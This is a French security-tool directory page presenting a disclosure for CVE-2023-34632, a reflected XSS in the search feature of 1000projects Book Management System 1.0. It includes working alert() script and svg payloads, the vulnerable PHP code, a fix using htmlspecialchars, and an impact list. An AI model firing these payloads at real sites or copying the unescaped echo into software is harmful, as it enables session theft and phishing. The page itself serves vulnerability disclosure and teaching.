Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-34632 — XSS réfléchie dans 1000projects Book Management System 1.0 | Kitploit
Outils/GitHubGitHub/ssophiz/cve-2023-34632
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebArticles et RechercheApprentissage et Éducation
GitHubssophiz/cve-2023-34632

CVE-2023-34632

XSS réfléchie dans 1000projects Book Management System 1.0

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-34632

XSS Réfléchi dans 1000projects Book Management System 1.0

image

CVE-2023-34632

Cross-Site Scripting (XSS) Réfléchi dans 1000projects Book Management System 1.0


Description

Une vulnérabilité de Cross-Site Scripting (XSS) réfléchi a été découverte dans 1000projects Book Management System version 1.0. La vulnérabilité existe dans la fonctionnalité de recherche (index.php), où l'entrée fournie par l'utilisateur via le paramètre search est reflétée dans la réponse HTTP sans échappement ou assainissement approprié.

Un attaquant peut créer une URL malveillante contenant du code JavaScript. Lorsque la victime clique sur le lien, le script s'exécute dans le contexte de la session du navigateur de la victime, pouvant entraîner le détournement de session, le vol d'identifiants ou des attaques de phishing.


Produit affecté

ÉlémentDétail
Vendeur1000projects
ProduitBook Management System
Version1.0
Composantindex.php (fonctionnalité de recherche)
TechnologiePHP / MySQL

Détails de la vulnérabilité

ÉlémentDétail
Identifiant CVECVE-2023-34632
TypeCWE-79: Neutralisation incorrecte de l'entrée lors de la génération de pages Web (XSS réfléchi)
Vecteur d'attaqueRéseau
Complexité d'attaqueFaible
Privilèges requisAucun
Interaction utilisateurRequise (la victime clique sur une URL malveillante)
Score CVSS 3.16.1 (Moyen)
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Preuve de concept

Charge utile (Payload)

root@kitploit:~
http://localhost/book-management/index.php?search="><script>alert('CVE-2023-34632')</script>

Étapes pour reproduire

  1. Installer XAMPP/WAMP et déployer Book Management System 1.0 dans la racine web
  2. Accéder à l'application dans un navigateur
  3. Saisir la charge utile suivante dans la boîte de recherche (ou visiter l'URL malveillante ci-dessus) :
    root@kitploit:~
    "><script>alert('CVE-2023-34632')</script>
    
  4. Observer l'alerte JavaScript contextuelle, confirmant la vulnérabilité XSS

Capture d'écran

XSS PoC

Charges utiles alternatives

root@kitploit:~
">
root@kitploit:~
"><svg/onload=alert('CVE-2023-34632')>

Cause racine

La valeur du paramètre search est directement intégrée dans la réponse HTML sans aucune assainissement. Le code PHP n'applique pas htmlspecialchars() ou un échappement équivalent avant d'afficher l'entrée utilisateur.

Extrait de code vulnérable

root@kitploit:~
// Vulnérable - entrée utilisateur directement rendue dans la sortie HTML
$search = $_GET['search'];
echo "Résultats de la recherche pour : " . $search;

Correction

Appliquer un échappement approprié à toute entrée utilisateur avant de l'afficher dans un contexte HTML :

root@kitploit:~
// Corrigé - échappement correct de la sortie
$search = htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');
echo "Résultats de la recherche pour : " . $search;

Impact

  • Détournement de session — L'attaquant peut voler les cookies de session via document.cookie
  • Vol d'identifiants — Des formulaires de connexion factices peuvent être injectés pour hameçonner les identifiants de l'utilisateur
  • Distribution de malwares — Les victimes peuvent être redirigées vers des sites malveillants
  • Défacement — Le contenu de la page peut être manipulé dans le navigateur de la victime

Chronologie

DateÉvénement
2023-06Découverte de la vulnérabilité
2023-06Réservation de CVE-2023-34632 par MITRE
2026-02Divulgation publique

Crédit

Découvreur : Wonkyeom Kim (@ssophiz)


Références

  • 1000projects Book Management System
  • CWE-79: Neutralisation incorrecte de l'entrée lors de la génération de pages Web
  • OWASP - Cross-Site Scripting (XSS)
Télécharger l’outil